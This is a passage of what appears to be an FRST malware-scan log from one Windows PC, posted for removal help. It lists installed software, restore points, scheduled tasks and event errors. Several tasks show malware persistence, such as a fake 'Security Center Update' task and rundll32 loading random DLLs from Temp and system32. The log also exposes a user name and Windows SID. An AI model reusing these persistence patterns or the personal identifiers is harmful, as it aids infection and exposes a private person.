(HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)Network (Version: 120.0.194.000 - Hewlett-Packard) HiddenOCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)ProductContext (Version: 50.0.165.000 - Hewlett-Packard) HiddenQuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )Roxio Creator Audio (Version: 3.7.0 - Roxio) HiddenRoxio Creator Copy (Version: 3.7.0 - Roxio) HiddenRoxio Creator Data (Version: 3.7.0 - Roxio) HiddenRoxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)Roxio Creator DE (Version: 3.7.0 - Roxio) HiddenRoxio Creator Tools (Version: 3.7.0 - Roxio) HiddenRoxio Express Labeler 3 (Version: 3.2.1 - Roxio) HiddenRoxio Update Manager (Version: 6.0.0 - Roxio) HiddenSAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) HiddenScan (Version: 12.0.0.0 - Hewlett-Packard) HiddenShop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)Skins (Version: 2007.0731.2234.38497 - ATI) HiddenSmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) HiddenSolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) HiddenSpelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)Status (Version: 120.0.194.000 - Hewlett-Packard) HiddenToolbox (Version: 120.0.194.000 - Hewlett-Packard) HiddenTransporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)TrayApp (Version: 120.0.194.000 - Hewlett-Packard) HiddenUnloadSupport (Version: 11.0.0 - Hewlett-Packard) HiddenUpdate for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) ==================== Restore Points ========================= 29-07-2014 11:25:23 Scheduled Checkpoint30-07-2014 11:45:57 Scheduled Checkpoint01-08-2014 21:10:36 Scheduled Checkpoint02-08-2014 16:42:56 Scheduled Checkpoint04-08-2014 04:00:03 Scheduled Checkpoint07-08-2014 22:48:19 Scheduled Checkpoint11-08-2014 02:11:41 Scheduled Checkpoint11-08-2014 15:01:42 Scheduled Checkpoint12-08-2014 10:45:08 Scheduled Checkpoint14-08-2014 02:36:25 Scheduled Checkpoint14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:5914-08-2014 23:31:34 Advanced-System Protector15-08-2014 23:47:04 Removed SofTest16-08-2014 13:18:06 Removed DriverUpdate16-08-2014 13:29:10 Removed HTC Sync.16-08-2014 13:44:46 Removed HTC Sync.16-08-2014 14:02:17 Removed HTC BMP USB Driver.16-08-2014 16:47:50 Advanced-System Protector16-08-2014 21:58:06 Installed AVG 201416-08-2014 22:11:41 Removed SlimCleaner Plus16-08-2014 22:14:50 Removed HTC Driver Installer.17-08-2014 19:56:09 Installed AVG 201417-08-2014 19:59:04 Installed AVG 201417-08-2014 20:03:04 Removed AVG 201417-08-2014 20:04:51 Installed AVG 201117-08-2014 21:08:16 Installed AVG 201417-08-2014 21:16:20 Installed AVG 201417-08-2014 21:24:43 Removed AVG 201417-08-2014 21:26:10 Installed AVG 201119-08-2014 21:04:48 Advanced-System Protector21-08-2014 01:40:12 Advanced-System Protector23-08-2014 20:47:11 Checkpoint by HitmanPro ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts127.0.0.1 localhost ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMMTask: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTIONTask: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exeTask: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exeTask: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServerTask: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UITask: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exeTask: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPagesTask: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exeTask: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTIONTask: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exeTask: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll" (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exeTask: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe ==================== Loaded Modules (whitelisted) ============= 2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft 6to4 Adapter #2Description: Microsoft 6to4 AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: tunnelProblem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)Resolution: Update the driver Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 1022nDescription: HP LaserJet 1022nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6940 seriesDescription: Deskjet 6940 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: hp LaserJet 2420Description: hp LaserJet 2420Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet CP1025nwDescription: HP LaserJet CP1025nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 200 color M251nwDescription: HP LaserJet 200 color M251nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CURRENT SESSION> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) System errors:=============Error: (08/25/2014 01:43:07 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 01:36:58 PM) (Source: VDS Dynamic Provider) (EventID: 10) (User: )Description: The provider failed while storing notifications from the driver. The Virtual Disk Service should be restarted. hr=80042505 Error: (08/25/2014 01:20:43 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 01:08:55 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 00:58:18 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 00:14:03 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 00:04:56 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 11:55:18 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 11:45:56 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 11:26:20 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Microsoft Office Sessions:=========================Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash. Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash. Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash. Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash. CodeIntegrity Errors:=================================== Date: 2014-08-25 13:41:40.016 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.905 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.794 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.682 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.419 Description: Code 